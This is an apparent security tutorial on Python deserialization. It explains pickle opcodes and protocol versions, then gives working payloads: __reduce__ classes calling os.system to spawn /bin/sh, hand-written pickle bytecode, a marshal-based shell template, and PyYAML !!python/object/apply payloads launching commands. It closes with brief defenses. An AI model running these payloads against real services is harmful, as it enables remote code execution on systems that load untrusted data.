Python Deserialization Vulnerabilities
Word count 10005 2022-08-28 12:18:50

Serialization

import pickle

class Demo():
    def __init__(self, name='h3rmesk1t'):
        self.name = name

print(pickle.dumps(Demo()))

Output:

b'\x80\x04\x95/\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04Demo\x94\x93\x94)\x81\x94}\x94\x8c\x04name\x94\x8c\th3rmesk1t\x94sb.'

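The long byte string in the output is actually a sequence of opcodes for the pickle virtual machine (PVM); pickle.py documents each of these opcodes.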
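To make the opcode stream readable, the standard-library pickletools module can disassemble it without executing anything. The sketch below feeds it the exact bytes shown above; the helper name disassemble is only illustrative.

```python
import io
import pickletools

# The pickle produced above, copied verbatim.
data = (b'\x80\x04\x95/\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94'
        b'\x8c\x04Demo\x94\x93\x94)\x81\x94}\x94\x8c\x04name\x94'
        b'\x8c\th3rmesk1t\x94sb.')


def disassemble(raw: bytes) -> str:
    """Return the pickletools listing of a pickle as text (nothing is executed)."""
    out = io.StringIO()
    pickletools.dis(raw, out=out)
    return out.getvalue()


listing = disassemble(data)
print(listing)
```

The listing names each opcode (PROTO, FRAME, STACK_GLOBAL, NEWOBJ, BUILD, STOP and so on) next to its byte offset, which makes it easier to follow the sections below.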

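PVM

Components

The PVM consists of three parts:

  • Instruction processor: reads opcodes and their arguments from the stream and interprets them. It repeats this until it reaches the terminator ".", at which point the value left on top of the stack is returned as the deserialized object.
  • Stack: implemented as a Python list and used for temporary storage of data, arguments and objects. Deserialization proceeds by pushing to and popping from the stack, and the final result ends up on top of it.
  • Memo: implemented as a Python dict; it provides storage for the whole lifetime of the PVM.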
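The three parts can be sketched as a toy interpreter. This is a minimal illustration, not the real pickle.py: it handles only a few data-only protocol 0 opcodes, uses a sentinel object for the mark instead of pickle.py's metastack, and deliberately leaves out GLOBAL and REDUCE so that it cannot call anything. The name toy_loads is hypothetical.

```python
import ast
import pickle


def toy_loads(data: bytes):
    """Interpret a tiny, data-only subset of protocol 0 opcodes."""
    stack, memo, pos = [], {}, 0   # the stack is a list, the memo a dict
    mark = object()                # sentinel standing in for the markobject

    def read_line() -> str:
        nonlocal pos
        end = data.index(b'\n', pos)
        line = data[pos:end].decode('ascii')
        pos = end + 1
        return line

    def pop_to_mark() -> list:
        items = []
        while stack[-1] is not mark:
            items.append(stack.pop())
        stack.pop()                # drop the mark itself
        return items[::-1]

    while True:                    # the instruction processor loop
        op = data[pos:pos + 1]
        pos += 1
        if op == b'(':             # MARK
            stack.append(mark)
        elif op == b'I':           # INT (bool forms I00/I01 not handled)
            stack.append(int(read_line()))
        elif op == b'S':           # STRING, a quoted literal
            stack.append(ast.literal_eval(read_line()))
        elif op == b't':           # TUPLE
            stack.append(tuple(pop_to_mark()))
        elif op == b'l':           # LIST
            stack.append(pop_to_mark())
        elif op == b'p':           # PUT: store stack top in the memo
            memo[int(read_line())] = stack[-1]
        elif op == b'g':           # GET: push a memo entry
            stack.append(memo[int(read_line())])
        elif op == b'.':           # STOP: the stack top is the result
            return stack.pop()
        else:
            raise ValueError(f'unsupported opcode {op!r}')


sample = b"(I1\nS'two'\np0\ng0\nt."
print(toy_loads(sample), pickle.loads(sample))
```

For this input the toy interpreter and pickle.loads build the same tuple, with the memo supplying the repeated string.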

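Execution flow

The flow described in this subsection belongs to the Python virtual machine that runs ordinary Python programs. It is separate from the pickle machine above, even though both are commonly abbreviated PVM.

First, the interpreter compiles the source code into bytecode. Bytecode is a Python-specific intermediate representation: it is not native machine code, and it is interpreted by the virtual machine rather than run directly by the CPU. For imported modules, if the Python process has write permission on the host, the bytecode is cached in a file with the .pyc extension; without write permission the bytecode exists only in memory and is discarded when the program exits.
In general it is best to give the Python process write permission when deploying a program, so that as long as the source is unchanged the cached .pyc file can be reused and the compile step skipped on later imports. A .pyc file also keeps the source text out of sight, although bytecode is easy to decompile, so this is not real protection.
Finally, the compiled bytecode is handed to the Python virtual machine, which executes the bytecode instructions in a loop until all operations are complete.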
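The compile-then-execute flow can be observed from Python itself. The following is a small sketch using only standard-library calls; the source string and the file name demo.py are made up for illustration.

```python
import dis
import importlib.util

source = "result = sum(n * n for n in range(4))"

# Step 1: compile source text into a code object holding bytecode.
code = compile(source, "<demo>", "exec")

# Step 2: let the virtual machine execute that bytecode.
namespace = {}
exec(code, namespace)
print(namespace["result"])

# Inspect the bytecode instructions the virtual machine iterates over.
dis.dis(code)

# Where CPython would cache the bytecode of a module named demo.py.
cache_path = importlib.util.cache_from_source("demo.py")
print(cache_path)
```

The exact instructions printed by dis.dis and the cache file name vary between Python versions.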

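Instruction set

There are currently six pickle protocols. The higher the protocol version used, the newer the Python version needed to read the resulting pickle.

  • Protocol v0 is the original "human-readable" protocol and is backwards compatible with earlier versions of Python.
  • Protocol v1 is an old binary format that is also compatible with earlier versions of Python.
  • Protocol v2 was introduced in Python 2.3. It provides a much more efficient mechanism for storing new-style classes; see PEP 307.
  • Protocol v3 was added in Python 3.0. It has explicit support for bytes objects and cannot be read by Python 2.x. It was the default protocol from Python 3.0 to 3.7.
  • Protocol v4 was added in Python 3.4. It supports very large objects, can pickle more kinds of objects, and includes some data format optimizations; see PEP 3154. It became the default protocol in Python 3.8, which is why the output above starts with \x80\x04.
  • Protocol v5 was added in Python 3.8. It supports out-of-band data and speeds up in-band data handling; see PEP 574.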
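As a quick way to see the protocol differences, the sketch below pickles a harmless dictionary with every available protocol and reads the protocol number back from the leading PROTO opcode. The helper detect_protocol is a hypothetical name; protocols 0 and 1 carry no PROTO opcode, so it returns None for them.

```python
import pickle
import pickletools

value = {"name": "h3rmesk1t", "tags": [1, 2, 3]}


def detect_protocol(data: bytes):
    """Return the PROTO argument of a pickle, or None for protocols 0 and 1."""
    opcode, arg, _pos = next(pickletools.genops(data))
    return arg if opcode.name == "PROTO" else None


for proto in range(pickle.HIGHEST_PROTOCOL + 1):
    data = pickle.dumps(value, protocol=proto)
    print(proto, detect_protocol(data), len(data), "bytes")

print("default protocol:", pickle.DEFAULT_PROTOCOL)
```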
# Pickle opcodes.  See pickletools.py for extensive docs.  The listing
# here is in kind-of alphabetical order of 1-character pickle code.
# pickletools groups them by purpose.

MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding

TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py

# Protocol 2

PROTO = b'\x80' # identify pickle protocol
NEWOBJ = b'\x81' # build object by applying cls.__new__ to argtuple
EXT1 = b'\x82' # push object from extension registry; 1-byte index
EXT2 = b'\x83' # ditto, but 2-byte index
EXT4 = b'\x84' # ditto, but 4-byte index
TUPLE1 = b'\x85' # build 1-tuple from stack top
TUPLE2 = b'\x86' # build 2-tuple from two topmost stack items
TUPLE3 = b'\x87' # build 3-tuple from three topmost stack items
NEWTRUE = b'\x88' # push True
NEWFALSE = b'\x89' # push False
LONG1 = b'\x8a' # push long from < 256 bytes
LONG4 = b'\x8b' # push really big long

_tuplesize2code = [EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3]

# Protocol 3 (Python 3.x)

BINBYTES = b'B' # push bytes; counted binary string argument
SHORT_BINBYTES = b'C' # " " ; " " " " < 256 bytes

# Protocol 4

SHORT_BINUNICODE = b'\x8c' # push short string; UTF-8 length < 256 bytes
BINUNICODE8 = b'\x8d' # push very long string
BINBYTES8 = b'\x8e' # push very long bytes string
EMPTY_SET = b'\x8f' # push empty set on the stack
ADDITEMS = b'\x90' # modify set by adding topmost stack items
FROZENSET = b'\x91' # build frozenset from topmost stack items
NEWOBJ_EX = b'\x92' # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL = b'\x93' # same as GLOBAL but using names on the stacks
MEMOIZE = b'\x94' # store top of the stack in memo
FRAME = b'\x95' # indicate the beginning of a new frame

# Protocol 5

BYTEARRAY8 = b'\x96' # push bytearray
NEXT_BUFFER = b'\x97' # push next out-of-band buffer
READONLY_BUFFER = b'\x98' # make top of stack readonly

As mentioned above, the opcodes come in several versions. When serializing, pass protocol=num to choose the version; the value must be less than or equal to 5.

import os
import pickle

class Demo():
    def __init__(self, name='h3rmesk1t'):
        self.name = name

    def __reduce__(self):
        return (os.system, ('whoami',))

demo = Demo()
for i in range(6):
    print('[+] pickle v{}: {}'.format(str(i), pickle.dumps(demo, protocol=i)))

Output:

[+] pickle v0: b'cposix\nsystem\np0\n(Vwhoami\np1\ntp2\nRp3\n.'
[+] pickle v1: b'cposix\nsystem\nq\x00(X\x06\x00\x00\x00whoamiq\x01tq\x02Rq\x03.'
[+] pickle v2: b'\x80\x02cposix\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
[+] pickle v3: b'\x80\x03cposix\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
[+] pickle v4: b'\x80\x04\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.'
[+] pickle v5: b'\x80\x05\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.'


Basic pattern:

c<module>
<callable>
(<args>
tR.

A short piece of pickle bytecode illustrates the exploitation process:

cos
system
(S'whoami'
tR.


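The bytecode above is equivalent to __import__('os').system(*('whoami',)). Broken down step by step:

cos         =>  import the module os.
system      =>  look up system in that module and push it onto the stack.
(S'whoami'  =>  save the current stack to the metastack, clear the stack, then push 'whoami' onto the stack.
t           =>  pop the values on the stack into a tuple, restore the metastack to the stack, then push the tuple.
R           =>  pop the tuple and the callable, call system(*('whoami',)) and push the result.
.           =>  stop and return the item on top of the stack.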
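The same opcode pattern can be tried safely by swapping os.system for a harmless built-in. In this sketch the callable is builtins.len (an illustrative substitution, not part of the original payload), so loading the pickle merely computes the length of the string.

```python
import io
import pickle
import pickletools

# Same shape as the payload above: GLOBAL, MARK, STRING, TUPLE, REDUCE, STOP.
payload = b"cbuiltins\nlen\n(S'whoami'\ntR."

result = pickle.loads(payload)   # the R opcode calls len(*('whoami',))
print(result)

out = io.StringIO()
pickletools.dis(payload, out=out)  # disassemble without executing
listing = out.getvalue()
print(listing)
```

The point to notice is that pickle.loads returned the result of a function call that the byte string itself selected; no class from the application was involved.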

Note that not every object can be serialized and deserialized with pickle. File objects, network socket objects and code objects, for example, cannot.
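A quick check of that limitation, as a sketch: the helper can_pickle is a hypothetical name, and the socket case is left out so that the example needs no network access.

```python
import pickle
import tempfile


def can_pickle(obj) -> bool:
    """Return True if pickle.dumps accepts the object."""
    try:
        pickle.dumps(obj)
    except (TypeError, pickle.PicklingError):
        return False
    return True


def sample():
    return 1


with tempfile.TemporaryFile() as fh:
    file_ok = can_pickle(fh)                     # an open file object

code_ok = can_pickle(sample.__code__)            # a code object
dict_ok = can_pickle({"a": [1, 2.0, "three"]})   # plain data

print(file_ok, code_ok, dict_ok)
```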

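Exploitation

The vulnerability exists because pickle can serialize and deserialize instances of user-defined classes, and a class can define __reduce__() to tell pickle how the object should be rebuilt. __reduce__() itself runs at serialization time; the callable and arguments it returns are written into the pickle and invoked during deserialization, which is what triggers the malicious code.

Put simply, the effect resembles the __wakeup() method in PHP: code chosen by whoever produced the data runs as part of deserialization. The return value of __reduce__() is handled as follows:

  1. If the return value is a string, it is treated as the name of a global variable: pickle looks up the object with that name in its module's namespace and serializes a reference to it.
  2. If the return value is a tuple, it must have between 2 and 6 elements (the sixth element was added in Python 3.8).
    1. The first element is a callable object.
    2. The second is a tuple of arguments for that callable; if the callable takes no arguments, an empty tuple must be given.
    3. The third is an optional element representing the object's state. It is passed to the object's __setstate__() method; if the object has no such method, the element must be a dictionary and is added to the object's __dict__ attribute.
    4. The fourth is an optional iterator yielding successive items.
    5. The fifth is an optional iterator yielding successive key-value pairs.
    6. The sixth is an optional callable with the signature (obj, state).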
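The two-element tuple form, and the point at which each piece runs, can be seen with a harmless callable. This is a minimal sketch: the class name Greeting and the calls list are illustrative, and int stands in for whatever callable an attacker would choose.

```python
import pickle

calls = []


class Greeting:
    def __reduce__(self):
        # Runs while pickling; records that it was invoked.
        calls.append("__reduce__ called")
        # (callable, args): pickle.loads will later call int("42").
        return (int, ("42",))


data = pickle.dumps(Greeting())
calls_after_dumps = list(calls)

restored = pickle.loads(data)
calls_after_loads = list(calls)

print(calls_after_dumps, restored, type(restored).__name__)
```

After the round trip, restored is the return value of the callable rather than a Greeting instance, and __reduce__() was called once, during dumps and not during loads.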

Basic payload

import os
import pickle

class Demo(object):
    def __reduce__(self):
        shell = '/bin/sh'
        return (os.system, (shell,))

demo = Demo()
pickle.loads(pickle.dumps(demo))


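Marshal deserialization

Because pickle cannot serialize code objects, the standard-library marshal module is used to serialize them instead.

import base64
import marshal

def demo():
    import os
    os.system('/bin/sh')

# Marshal the function's code object. Writing demo() here would run the
# function and marshal its return value (None) instead.
code_serialized = base64.b64encode(marshal.dumps(demo.__code__))
print(code_serialized)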

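However, the marshalled function cannot be used with __reduce__ directly. __reduce__ works by calling some callable and passing it arguments, whereas here the unmarshalled function is itself the callable: it has to be executed, not passed as an argument to another function.
This is where the PVM opcodes analyzed above come in. Start by writing out what needs to be executed: Python can create an anonymous function dynamically with types.FunctionType(func_code, globals(), '')(); see the official documentation for details.
Combined with the sample code above, what ultimately has to be executed is: (types.FunctionType(marshal.loads(base64.b64decode(code_enc)), globals(), ''))().
Here is a payload template published by another researcher.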

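import base64
import pickle
import marshal

def foo():
    import os
    os.system('whoami;/bin/sh')  # evil code

# Python 3 port of the template: the original used the Python 2 names
# foo.func_code and __builtin__, and passed a str to pickle.loads.
code_enc = base64.b64encode(marshal.dumps(foo.__code__)).decode('ascii')

shell = """ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRcbuiltins
globals
(tRS''
tR(tR.""" % code_enc

print(pickle.loads(shell.encode('ascii')))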
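The chain the template encodes (base64 decode, marshal.loads, types.FunctionType, then a call) can be exercised on its own with a harmless function. In this sketch the function greet and the variable names are illustrative; note that marshal data is specific to the Python version that produced it.

```python
import base64
import marshal
import types


def greet():
    return "hello from a rebuilt function"


# Serialize only the code object, as the payload template does.
encoded = base64.b64encode(marshal.dumps(greet.__code__))

# Reverse the steps: decode, unmarshal, wrap in a new function, call it.
code_obj = marshal.loads(base64.b64decode(encoded))
rebuilt = types.FunctionType(code_obj, globals(), "")
result = rebuilt()

print(result)
```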


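PyYAML deserialization

Vulnerable code

Open yaml/constructor.py and look at the source code for three special Python tags:

  • the !!python/object tag.
  • the !!python/object/new tag.
  • the !!python/object/apply tag.


All three tags end up calling make_python_instance. Following that function shows that it dynamically creates a new Python class instance from its arguments, or creates an object from a class referenced through a module, which makes arbitrary command execution possible.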

Payload (PyYAML < 5.1)

!!python/object/apply:os.system ["calc.exe"]
!!python/object/new:os.system ["calc.exe"]
!!python/object/new:subprocess.check_output [["calc.exe"]]
!!python/object/apply:subprocess.check_output [["calc.exe"]]

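Payload (PyYAML >= 5.1)

From PyYAML 5.1 on, load() no longer uses the unsafe loader by default, so the payload only fires when the application explicitly passes Loader=Loader or calls unsafe_load().

from yaml import *
data = b"""!!python/object/apply:subprocess.Popen
- calc"""
deserialized_data = load(data, Loader=Loader)
print(deserialized_data)


from yaml import *
data = b"""!!python/object/apply:subprocess.Popen
- calc"""
deserialized_data = unsafe_load(data)
print(deserialized_data)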
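For comparison, PyYAML's safe_load() refuses these Python-specific tags. The sketch below assumes PyYAML is installed (it is a third-party package, so the import is guarded); the helper check_safe_load and the echo command are illustrative only, and the command is never run.

```python
try:
    import yaml  # PyYAML, third-party
except ImportError:
    yaml = None

DOC = '!!python/object/apply:os.system ["echo pwned"]'


def check_safe_load(text: str) -> str:
    """Report how yaml.safe_load reacts to a document."""
    if yaml is None:
        return "PyYAML not installed"
    try:
        yaml.safe_load(text)
    except yaml.YAMLError as exc:
        return f"rejected: {type(exc).__name__}"
    return "loaded"


outcome = check_safe_load(DOC)
print(outcome)

# Ordinary data still loads normally with safe_load.
plain = None if yaml is None else yaml.safe_load("name: h3rmesk1t\nports: [80, 443]")
print(plain)
```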

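Defenses

  • Use the higher-level interfaces __getnewargs__(), __getstate__(), __setstate__() and so on instead of the __reduce__() magic method.
  • Filter strictly before deserializing; with the pickle library this can be implemented with a decorator.

Reference: https://xz.aliyun.com/t/11082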
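One way to do the filtering for pickle, following the pattern described in the pickle documentation rather than the decorator mentioned above, is to subclass pickle.Unpickler and override find_class() with an allowlist. This is a sketch: the allowlist contents and the names RestrictedUnpickler and restricted_loads are choices made for illustration, and an allowlist reduces the risk but does not make unpickling untrusted data safe in general.

```python
import builtins
import io
import pickle

# Assumption: only these harmless built-ins may be referenced by a pickle.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle asks for (GLOBAL / STACK_GLOBAL).
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but refuses any global outside the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


print(restricted_loads(pickle.dumps([1, 2, range(15)])))

try:
    restricted_loads(b"cos\nsystem\n(S'echo hello world'\ntR.")
except pickle.UnpicklingError as exc:
    blocked = str(exc)
    print("blocked:", blocked)
```

The malicious pickle is rejected when find_class() is asked for os.system, before the REDUCE opcode is reached, so the command never runs.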
